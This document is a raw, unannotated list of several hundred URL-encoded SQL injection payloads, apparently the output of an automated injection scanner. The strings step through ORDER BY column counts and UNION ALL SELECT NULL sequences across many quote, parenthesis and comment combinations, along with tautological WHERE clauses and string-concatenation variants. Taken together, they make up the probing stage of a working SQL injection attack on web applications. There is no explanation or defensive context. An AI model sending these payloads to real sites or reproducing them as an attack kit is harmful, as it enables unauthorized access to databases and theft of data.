1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%29%20ORDER%20BY%201%23 1%25%27%29%29%29%20ORDER%20BY%206079%23 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%23 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%20ORDER%20BY%201%23 1%25%27%20ORDER%20BY%201017%23 1%25%27%20UNION%20ALL%20SELECT%20NULL%23 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%29%20ORDER%20BY%201%23 1%00%27%29%20ORDER%20BY%207372%23 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%23 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%20ORDER%20BY%201%23 1%00%27%20ORDER%20BY%201054%23 1%00%27%20UNION%20ALL%20SELECT%20NULL%23 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20WHERE%208254%3D8254%20ORDER%20BY%201%23 1%27%29%20WHERE%208434%3D8434%20ORDER%20BY%203071%23 1%27%29%20WHERE%204010%3D4010%20UNION%20ALL%20SELECT%20NULL%23 1%27%29%20WHERE%202826%3D2826%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%27%29%20WHERE%205138%3D5138%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%27%29%20WHERE%209371%3D9371%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20WHERE%204973%3D4973%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20WHERE%209858%3D9858%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20WHERE%204721%3D4721%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20WHERE%201340%3D1340%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20WHERE%204169%3D4169%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20WHERE%202969%3D2969%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20WHERE%208824%3D8824%20ORDER%20BY%201%23 1%22%29%20WHERE%202002%3D2002%20ORDER%20BY%205928%23 1%22%29%20WHERE%205922%3D5922%20UNION%20ALL%20SELECT%20NULL%23 1%22%29%20WHERE%204407%3D4407%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%22%29%20WHERE%201125%3D1125%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%22%29%20WHERE%204175%3D4175%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20WHERE%207228%3D7228%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20WHERE%201925%3D1925%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20WHERE%202776%3D2776%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20WHERE%209750%3D9750%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20WHERE%209736%3D9736%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20WHERE%205859%3D5859%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20WHERE%201050%3D1050%20ORDER%20BY%201%23 1%27%20WHERE%204548%3D4548%20ORDER%20BY%203194%23 1%27%20WHERE%209660%3D9660%20UNION%20ALL%20SELECT%20NULL%23 1%27%20WHERE%208522%3D8522%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%27%20WHERE%208464%3D8464%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%27%20WHERE%202523%3D2523%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%27%20WHERE%206957%3D6957%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20WHERE%201780%3D1780%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20WHERE%208348%3D8348%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20WHERE%205296%3D5296%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20WHERE%206078%3D6078%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20WHERE%208578%3D8578%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%209903%3D9903%20ORDER%20BY%201%23 1%22%20WHERE%204639%3D4639%20ORDER%20BY%202533%23 1%22%20WHERE%209684%3D9684%20UNION%20ALL%20SELECT%20NULL%23 1%22%20WHERE%205385%3D5385%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%22%20WHERE%201257%3D1257%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%22%20WHERE%209971%3D9971%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%201641%3D1641%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%204779%3D4779%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%204659%3D4659%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%204233%3D4233%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%203310%3D3310%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%207246%3D7246%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27rYoW%27%20FROM%20DUAL%20WHERE%202473%3D2473%20ORDER%20BY%201%23 1%27%7C%7C%28SELECT%20%27XGcW%27%20FROM%20DUAL%20WHERE%209656%3D9656%20ORDER%20BY%202093%23 1%27%7C%7C%28SELECT%20%27ioyn%27%20FROM%20DUAL%20WHERE%206605%3D6605%20UNION%20ALL%20SELECT%20NULL%23 1%27%7C%7C%28SELECT%20%27qvqK%27%20FROM%20DUAL%20WHERE%201913%3D1913%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27vVxw%27%20FROM%20DUAL%20WHERE%206415%3D6415%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27Crti%27%20FROM%20DUAL%20WHERE%206603%3D6603%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27dmjZ%27%20FROM%20DUAL%20WHERE%208637%3D8637%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27OLfl%27%20FROM%20DUAL%20WHERE%209586%3D9586%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27uYGt%27%20FROM%20DUAL%20WHERE%203644%3D3644%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27Xexm%27%20FROM%20DUAL%20WHERE%206713%3D6713%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27vDbM%27%20FROM%20DUAL%20WHERE%202436%3D2436%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27wLtE%27%20FROM%20DUAL%20WHERE%203408%3D3408%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27qAvT%27%20WHERE%209597%3D9597%20ORDER%20BY%201%23 1%27%7C%7C%28SELECT%20%27KKVX%27%20WHERE%206380%3D6380%20ORDER%20BY%204582%23 1%27%7C%7C%28SELECT%20%27sKXC%27%20WHERE%203746%3D3746%20UNION%20ALL%20SELECT%20NULL%23 1%27%7C%7C%28SELECT%20%27aZcD%27%20WHERE%202296%3D2296%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27zTCn%27%20WHERE%203099%3D3099%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27CbVi%27%20WHERE%208034%3D8034%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27Gdso%27%20WHERE%204080%3D4080%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27cmfF%27%20WHERE%206261%3D6261%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27gYkx%27%20WHERE%209744%3D9744%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27Vqcx%27%20WHERE%206141%3D6141%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27KBLc%27%20WHERE%209750%3D9750%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27sHlf%27%20WHERE%202013%3D2013%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20TOfR%20WHERE%204127%3D4127%20ORDER%20BY%201%23 1%27%2B%28SELECT%20BPXv%20WHERE%201361%3D1361%20ORDER%20BY%208689%23 1%27%2B%28SELECT%20BEwy%20WHERE%207541%3D7541%20UNION%20ALL%20SELECT%20NULL%23 1%27%2B%28SELECT%20hkqt%20WHERE%208023%3D8023%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%27%2B%28SELECT%20TBwY%20WHERE%205764%3D5764%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20GoYY%20WHERE%206969%3D6969%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20bwnx%20WHERE%209560%3D9560%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20lUyl%20WHERE%207884%3D7884%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20HQPa%20WHERE%202379%3D2379%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20SqTl%20WHERE%204019%3D4019%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20ICJZ%20WHERE%201671%3D1671%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20ueJS%20WHERE%206366%3D6366%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27lNIS%27%20WHERE%204610%3D4610%20ORDER%20BY%201%23 1%27%2B%28SELECT%20%27eqsa%27%20WHERE%203364%3D3364%20ORDER%20BY%208089%23 1%27%2B%28SELECT%20%27acCE%27%20WHERE%206341%3D6341%20UNION%20ALL%20SELECT%20NULL%23 1%27%2B%28SELECT%20%27dThZ%27%20WHERE%201765%3D1765%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%27%2B%28SELECT%20%27qIIo%27%20WHERE%201695%3D1695%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27SCJf%27%20WHERE%204138%3D4138%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27ViIO%27%20WHERE%202970%3D2970%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27HKtR%27%20WHERE%205301%3D5301%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27nXKK%27%20WHERE%209247%3D9247%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27jjpm%27%20WHERE%201894%3D1894%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27Syuh%27%20WHERE%209062%3D9062%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27kbIY%27%20WHERE%208198%3D8198%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%201%23 1%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%205084%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 -3235%29%20ORDER%20BY%201%23 -8159%29%20ORDER%20BY%204911%23 -5498%29%20UNION%20ALL%20SELECT%203233%23 -8245%29%20UNION%20ALL%20SELECT%208836%2C8836%23 -4807%29%20UNION%20ALL%20SELECT%202579%2C2579%2C2579%23 -7129%29%20UNION%20ALL%20SELECT%208297%2C8297%2C8297%2C8297%23 -3542%29%20UNION%20ALL%20SELECT%203645%2C3645%2C3645%2C3645%2C3645%23 -9655%29%20UNION%20ALL%20SELECT%208524%2C8524%2C8524%2C8524%2C8524%2C8524%23 -8544%29%20UNION%20ALL%20SELECT%205387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%23 -9150%29%20UNION%20ALL%20SELECT%201340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%2C1340%23 -7760%29%20UNION%20ALL%20SELECT%207080%2C7080%2C7080%2C7080%2C7080%2C7080%2C7080%2C7080%2C7080%23 -9005%29%20UNION%20ALL%20SELECT%209099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%2C9099%23 -6440%29%20ORDER%20BY%201%23 -1762%29%20ORDER%20BY%203148%23 -4756%29%20UNION%20ALL%20SELECT%204315%23 -6361%29%20UNION%20ALL%20SELECT%208638%2C8638%23 -4080%29%20UNION%20ALL%20SELECT%207782%2C7782%2C7782%23 -7869%29%20UNION%20ALL%20SELECT%208635%2C8635%2C8635%2C8635%23 -3258%29%20UNION%20ALL%20SELECT%205247%2C5247%2C5247%2C5247%2C5247%23 -8939%29%20UNION%20ALL%20SELECT%204216%2C4216%2C4216%2C4216%2C4216%2C4216%23 -7399%29%20UNION%20ALL%20SELECT%202219%2C2219%2C2219%2C2219%2C2219%2C2219%2C2219%23 -9157%29%20UNION%20ALL%20SELECT%209144%2C9144%2C9144%2C9144%2C9144%2C9144%2C9144%2C9144%23 -2392%29%20UNION%20ALL%20SELECT%208601%2C8601%2C8601%2C8601%2C8601%2C8601%2C8601%2C8601%2C8601%23 -9663%29%20UNION%20ALL%20SELECT%202490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%2C2490%23 -4335%29%29%20ORDER%20BY%201%23 -8025%29%29%20ORDER%20BY%202155%23 -2177%29%29%20UNION%20ALL%20SELECT%201341%23 -2118%29%29%20UNION%20ALL%20SELECT%205382%2C5382%23 -5021%29%29%20UNION%20ALL%20SELECT%206235%2C6235%2C6235%23 -4062%29%29%20UNION%20ALL%20SELECT%205975%2C5975%2C5975%2C5975%23 -5244%29%29%20UNION%20ALL%20SELECT%209241%2C9241%2C9241%2C9241%2C9241%23 -5608%29%29%20UNION%20ALL%20SELECT%206165%2C6165%2C6165%2C6165%2C6165%2C6165%23 -3898%29%29%20UNION%20ALL%20SELECT%204638%2C4638%2C4638%2C4638%2C4638%2C4638%2C4638%23 -2215%29%29%20UNION%20ALL%20SELECT%203202%2C3202%2C3202%2C3202%2C3202%2C3202%2C3202%2C3202%23 -7616%29%29%20UNION%20ALL%20SELECT%205398%2C5398%2C5398%2C5398%2C5398%2C5398%2C5398%2C5398%2C5398%23 -1345%29%29%20UNION%20ALL%20SELECT%203035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%23 -5580%29%29%29%20ORDER%20BY%201%23 -6027%29%29%29%20ORDER%20BY%208556%23 -2426%29%29%29%20UNION%20ALL%20SELECT%202961%23 -3798%29%29%29%20UNION%20ALL%20SELECT%203012%2C3012%23 -7066%29%29%29%20UNION%20ALL%20SELECT%204331%2C4331%2C4331%23 -9479%29%29%29%20UNION%20ALL%20SELECT%204382%2C4382%2C4382%2C4382%23 -8445%29%29%29%20UNION%20ALL%20SELECT%205427%2C5427%2C5427%2C5427%2C5427%23 -2220%29%29%29%20UNION%20ALL%20SELECT%202013%2C2013%2C2013%2C2013%2C2013%2C2013%23 -7326%29%29%29%20UNION%20ALL%20SELECT%209676%2C9676%2C9676%2C9676%2C9676%2C9676%2C9676%23 -3455%29%29%29%20UNION%20ALL%20SELECT%205618%2C5618%2C5618%2C5618%2C5618%2C5618%2C5618%2C5618%23 -8002%29%29%29%20UNION%20ALL%20SELECT%207300%2C7300%2C7300%2C7300%2C7300%2C7300%2C7300%2C7300%2C7300%23 -3925%29%29%29%20UNION%20ALL%20SELECT%203826%2C3826%2C3826%2C3826%2C3826%2C3826%2C3826%2C3826%2C3826%2C3826%23 -9788%20ORDER%20BY%201%23 -4007%20ORDER%20BY%204318%23 -2674%20UNION%20ALL%20SELECT%205478%23 -2639%20UNION%20ALL%20SELECT%202533%2C2533%23 -7200%20UNION%20ALL%20SELECT%203148%2C3148%2C3148%23 -6462%20UNION%20ALL%20SELECT%202887%2C2887%2C2887%2C2887%23 -7806%20UNION%20ALL%20SELECT%205252%2C5252%2C5252%2C5252%2C5252%23 -2781%20UNION%20ALL%20SELECT%204544%2C4544%2C4544%2C4544%2C4544%2C4544%23 -2737%20UNION%20ALL%20SELECT%204769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%23 -3266%20UNION%20ALL%20SELECT%204057%2C4057%2C4057%2C4057%2C4057%2C4057%2C4057%2C4057%23 -6115%20UNION%20ALL%20SELECT%208818%2C8818%2C8818%2C8818%2C8818%2C8818%2C8818%2C8818%2C8818%23 -9927%20UNION%20ALL%20SELECT%201534%2C1534%2C1534%2C1534%2C1534%2C1534%2C1534%2C1534%2C1534%2C1534%23 -6855%29%20WHERE%202018%3D2018%20ORDER%20BY%201%23 -2037%29%20WHERE%202823%3D2823%20ORDER%20BY%208828%23 -6345%29%20WHERE%207159%3D7159%20UNION%20ALL%20SELECT%207159%23 -9311%29%20WHERE%205196%3D5196%20UNION%20ALL%20SELECT%205196%2C5196%23 -2777%29%20WHERE%206201%3D6201%20UNION%20ALL%20SELECT%206201%2C6201%2C6201%23 -7255%29%20WHERE%201207%3D1207%20UNION%20ALL%20SELECT%201207%2C1207%2C1207%2C1207%23 -1223%29%20WHERE%206351%3D6351%20UNION%20ALL%20SELECT%206351%2C6351%2C6351%2C6351%2C6351%23 -4991%29%20WHERE%203167%3D3167%20UNION%20ALL%20SELECT%203167%2C3167%2C3167%2C3167%2C3167%2C3167%23 -4189%29%20WHERE%206861%3D6861%20UNION%20ALL%20SELECT%206861%2C6861%2C6861%2C6861%2C6861%2C6861%2C6861%23 -6756%29%20WHERE%203760%3D3760%20UNION%20ALL%20SELECT%203760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%23 -6325%29%20WHERE%203169%3D3169%20UNION%20ALL%20SELECT%203169%2C3169%2C3169%2C3169%2C3169%2C3169%2C3169%2C3169%2C3169%23 -6925%29%20WHERE%207112%3D7112%20UNION%20ALL%20SELECT%207112%2C7112%2C7112%2C7112%2C7112%2C7112%2C7112%2C7112%2C7112%2C7112%23 -1458%20WHERE%204520%3D4520%20ORDER%20BY%201%23 -4797%20WHERE%206525%3D6525%20ORDER%20BY%202708%23 -9323%20WHERE%208654%3D8654%20UNION%20ALL%20SELECT%208654%23 -4025%20WHERE%205878%3D5878%20UNION%20ALL%20SELECT%205878%2C5878%23 -2272%20WHERE%204178%3D4178%20UNION%20ALL%20SELECT%204178%2C4178%2C4178%23 -4911%20WHERE%203475%3D3475%20UNION%20ALL%20SELECT%203475%2C3475%2C3475%2C3475%23 -5844%20WHERE%206029%3D6029%20UNION%20ALL%20SELECT%206029%2C6029%2C6029%2C6029%2C6029%23 -5004%20WHERE%209521%3D9521%20UNION%20ALL%20SELECT%209521%2C9521%2C9521%2C9521%2C9521%2C9521%23 -4864%20WHERE%204956%3D4956%20UNION%20ALL%20SELECT%204956%2C4956%2C4956%2C4956%2C4956%2C4956%2C4956%23 -2317%20WHERE%208459%3D8459%20UNION%20ALL%20SELECT%208459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%23 -6749%20WHERE%205515%3D5515%20UNION%20ALL%20SELECT%205515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%23 -2669%20WHERE%206160%3D6160%20UNION%20ALL%20SELECT%206160%2C6160%2C6160%2C6160%2C6160%2C6160%2C6160%2C6160%2C6160%2C6160%23 